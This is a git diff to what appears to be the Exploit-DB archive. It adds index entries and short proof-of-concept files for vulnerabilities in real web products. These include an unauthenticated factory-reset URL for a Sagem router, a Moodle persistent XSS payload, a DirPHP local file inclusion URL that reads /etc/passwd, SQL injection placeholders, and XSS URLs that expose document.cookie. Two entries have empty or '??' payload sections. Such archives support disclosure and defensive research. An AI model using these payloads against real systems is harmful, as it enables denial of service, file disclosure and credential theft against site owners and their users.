diff --git a/files.csv b/files.csv
index 56f2b2d15..c3fefc86b 100755
--- a/files.csv
+++ b/files.csv
@@ -30775,3 +30775,11 @@ id,file,description,date,author,platform,type,port
34166,platforms/php/webapps/34166.txt,"KubeSupport 'lang' Parameter SQL Injection Vulnerability",2010-06-18,"L0rd CrusAd3r",php,webapps,0
34167,platforms/win32/local/34167.rb,"MQAC.sys Arbitrary Write Privilege Escalation",2014-07-25,metasploit,win32,local,0
34168,platforms/php/webapps/34168.py,"Pligg 2.0.1 - Multiple Vulnerabilities",2014-07-25,BlackHawk,php,webapps,80
+34169,platforms/php/webapps/34169.txt,"Moodle 2.7 - Persistent XSS",2014-07-27,"Osanda Malith",php,webapps,0
+34170,platforms/php/webapps/34170.txt,"ZeroCMS 1.0 - Persistent Cross-Site Scripting Vulnerability",2014-07-27,"Mayuresh Dani",php,webapps,0
+34172,platforms/hardware/webapps/34172.txt,"Sagem Fast 3304-V1 - Denial Of Service Vulnerability",2014-07-27,Z3ro0ne,hardware,webapps,0
+34173,platforms/php/webapps/34173.txt,"DirPHP 1.0 - LFI Vulnerability",2014-07-27,"black hat",php,webapps,0
+34175,platforms/php/webapps/34175.txt,"SaffaTunes CMS 'news.php' Multiple SQL Injection Vulnerabilities",2010-06-21,"Th3 RDX",php,webapps,0
+34176,platforms/php/webapps/34176.html,"osCmax 2.0 'articles.php' Cross Site Scripting Vulnerability",2010-06-21,"High-Tech Bridge SA",php,webapps,0
+34177,platforms/php/webapps/34177.txt,"Sigmer Technologies Scribe CMS 'copy_folder.php' Cross Site Scripting Vulnerability",2010-06-21,"High-Tech Bridge SA",php,webapps,0
+34179,platforms/jsp/webapps/34179.txt,"IBM WebSphere ILOG JRules 6.7 Cross Site Scripting Vulnerability",2010-06-21,IBM,jsp,webapps,0
diff --git a/platforms/hardware/webapps/34172.txt b/platforms/hardware/webapps/34172.txt
new file mode 100755
index 000000000..2d392f3b7
--- /dev/null
+++ b/platforms/hardware/webapps/34172.txt
@@ -0,0 +1,30 @@
+# Title : Sagem F@st 3304-V1 denial of service Vulnerability
+# Vendor Homepage : http://www.sagemcom.com
+# Tested on : Firefox, Google Chrome
+# Tested Router : Sagem F@st 3304-V1
+# Date : 2014-07-26
+# Author : Z3ro0ne
+# Contact : saadousfar59@gmail.com
+# Facebook Page : https://www.facebook.com/Z3ro0ne
+
+# Vulnerability description :
+the Vulnerability allow unauthenticated users to remotely restart and reset the router
+# Exploit:
+
+
+SAGEM FAST3304-V1 DENIAL OF SERVICE
+
+
+
+
+
+Reset to factory configuration :
+--- Using Google Chrome browser :
+to reset the router without any authentication just execute the following url http://ROUTER-ipaddress/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale in the url bar
+
+
+
diff --git a/platforms/jsp/webapps/34179.txt b/platforms/jsp/webapps/34179.txt
new file mode 100755
index 000000000..5b29d165c
--- /dev/null
+++ b/platforms/jsp/webapps/34179.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/41030/info
+
+IBM WebSphere ILOG JRules is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+The issue affects version 6.7.
+
+
+The following example input to the URI is available:
+??
\ No newline at end of file
diff --git a/platforms/php/remote/34160.txt b/platforms/php/remote/34160.txt
index 49ce22bf2..ba08178e8 100755
--- a/platforms/php/remote/34160.txt
+++ b/platforms/php/remote/34160.txt
@@ -291,3 +291,5 @@ print '\x20\x20[*] Log file: '+Fore.YELLOW+fname+Fore.RESET
print
sys.exit()
+
+##EDB-Note: Web server has to be able to interpret .php5 files
\ No newline at end of file
diff --git a/platforms/php/webapps/34169.txt b/platforms/php/webapps/34169.txt
new file mode 100755
index 000000000..0b2fd90b4
--- /dev/null
+++ b/platforms/php/webapps/34169.txt
@@ -0,0 +1,24 @@
+Title: Moodle 2.7 Persistent XSS
+Vendor: https://moodle.org/
+Moodle advisory: https://moodle.org/mod/forum/discuss.php?d=264265
+Researched by: Osanda Malith Jayathissa (@OsandaMalith)
+E-Mail: osanda[cat]unseen.is
+Original write-up: http://osandamalith.wordpress.com/2014/07/25/moodle-2-7-persistent-xss/
+
+[-] POC
+================
+
+1. Edit your profile
+2. Click Optional
+3. In Skype ID field inject this payload
+
+x" onload="prompt('XSS by Osanda')">"
+
+[-] Disclosure Timeline
+========================
+
+2014-05-24: Responsibly disclosed to the Vendor
+2014-05-27: Suggested a fix
+2014-06-04: Fix got accepted
+2014-07-21: Vendor releases a security announcement
+2014-07-24: Released Moodle 2.7.1 stable with all patches
\ No newline at end of file
diff --git a/platforms/php/webapps/34170.txt b/platforms/php/webapps/34170.txt
new file mode 100755
index 000000000..e0cb418c3
--- /dev/null
+++ b/platforms/php/webapps/34170.txt
@@ -0,0 +1,54 @@
+######################
+# Exploit Title: Persistent ZeroCMS Cross-Site Scripting Vulnerability
+
+# Discovered by: Mayuresh Dani
+
+# Vendor Homepage: http://www.aas9.in/zerocms/
+
+# Software Link: https://github.com/pcx1256/zerocms/archive/master.zip
+
+# Version: 1.0?
+
+# Date: 2014-07-25
+
+# Tested on: Windows 7 / Mozilla Firefox
+ Ubuntu 14.04 / Mozilla Firefox
+
+# CVE: CVE-2014-4710
+
+######################
+
+# Vulnerability Disclosure Timeline:
+
+2014-06-15: Discovered vulnerability
+2014-06-23: Vendor Notification (Support e-mail address)
+2014-07-25: Public Disclosure
+
+# Description
+
+ZeroCMS is a very simple Content Management System Built using PHP and
+MySQL.
+
+The application does not validate any input to the "Full Name", "Email
+Address", "Password" or "Confirm Password" functionality. It saves this
+unsanitized input in the backend databased and executes it when visiting
+the subsequent or any logged-in pages.
+
+######################
+
+# Steps to reproduce the vulnerability
+
+1) Visit the "Create Account" page (eg.
+http://localhost/zerocms/zero_transact_user.php)
+
+2) Enter your favourite XSS payload and click on "Create Account"
+
+3) Enjoy!
+
+More information:
+https://community.qualys.com/blogs/securitylabs/2014/07/24/yet-another-zerocms-cross-site-scripting-vulnerability-cve-2014-4710
+
+#####################
+
+Thanks,
+Mayuresh.
diff --git a/platforms/php/webapps/34173.txt b/platforms/php/webapps/34173.txt
new file mode 100755
index 000000000..de749046a
--- /dev/null
+++ b/platforms/php/webapps/34173.txt
@@ -0,0 +1,12 @@
+# Exploit Title: DirPHP - version 1.0 Local File Inclusion
+# Google Dork: intext:DirPHP - version 1.0 - Created & Maintained by Stuart
+Montgomery
+# Date: 7/26/14
+# Exploit Author: -Chosen-
+# Contact: dark[dot]binary[dot]code@gmail.com
+# Version: DirPHP - Version 1.0
+# Tested on: *nix
+
+PoC:
+
+http://site.com/path/index.php?phpfile=/etc/passwd
diff --git a/platforms/php/webapps/34175.txt b/platforms/php/webapps/34175.txt
new file mode 100755
index 000000000..ebb751843
--- /dev/null
+++ b/platforms/php/webapps/34175.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/40995/info
+
+SaffaTunes CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/cms/news.php?id=9[CODE]
+http://www.example.com/cms/news.php?year=2010[CODE]
\ No newline at end of file
diff --git a/platforms/php/webapps/34176.html b/platforms/php/webapps/34176.html
new file mode 100755
index 000000000..bc4840611
--- /dev/null
+++ b/platforms/php/webapps/34176.html
@@ -0,0 +1,44 @@
+source: http://www.securityfocus.com/bid/40998/info
+
+osCmax is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+osCMax 2.0.25 is vulnerable; other versions may also be affected.
+
+
+
diff --git a/platforms/php/webapps/34177.txt b/platforms/php/webapps/34177.txt
new file mode 100755
index 000000000..489b33084
--- /dev/null
+++ b/platforms/php/webapps/34177.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41000/info
+
+Sigmer Technologies Scribe CMS is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+https://www.example.com/path/copy_folder.php?path=SITE/%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
\ No newline at end of file